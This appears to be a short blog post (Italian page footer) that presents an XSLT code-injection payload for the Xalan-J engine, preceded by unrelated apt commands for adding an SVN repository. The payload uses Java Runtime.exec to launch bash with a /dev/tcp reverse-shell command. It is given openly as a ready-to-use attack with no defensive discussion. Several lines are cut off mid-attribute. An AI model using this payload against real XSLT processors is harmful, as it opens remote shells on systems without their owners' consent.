# apt-add-repository ppa:svn/ppa
# apt-get update
# apt-get dist-upgrade
11/01/13
XSLT os command execution (reverse shell)
XSLT code injection
<xsl:stylesheet xmlns:xsl="http://www.w3.org/
<xsl:output method="text"/>
<xsl:strip-space elements="*"/>
<xsl:variable name="rt" select="runtime:getRuntime()"/
<xsl:variable name="unix_shell" select="'/bin/bash'"/>
<xsl:variable name="unix_option" select="'-c'"/>
<xsl:variable name="command" select="'0<&196;exec 196<>/dev/tcp/<
<xsl:variable name="separator" select="' ---Separator-- '"/>
<xsl:template match="/">
<xsl:variable name="tmp">
<xsl:value-of select="concat($unix_shell, $separator, $unix_option, $separator, $command)"/>
</xsl:variable>
<xsl:variable name="cmd" select="j:java.lang.String.
<xsl:variable name="array" select="j:split($cmd, $separator)"/>
<xsl:variable name="proc" select="runtime:exec($rt, $array)"/>
</xsl:template>
</xsl:stylesheet>
Riferimenti:
http://xhe.myxwiki.org/xwiki/bin/view/XSLT/Engine_XalanJ
Iscriviti a:
Post (Atom)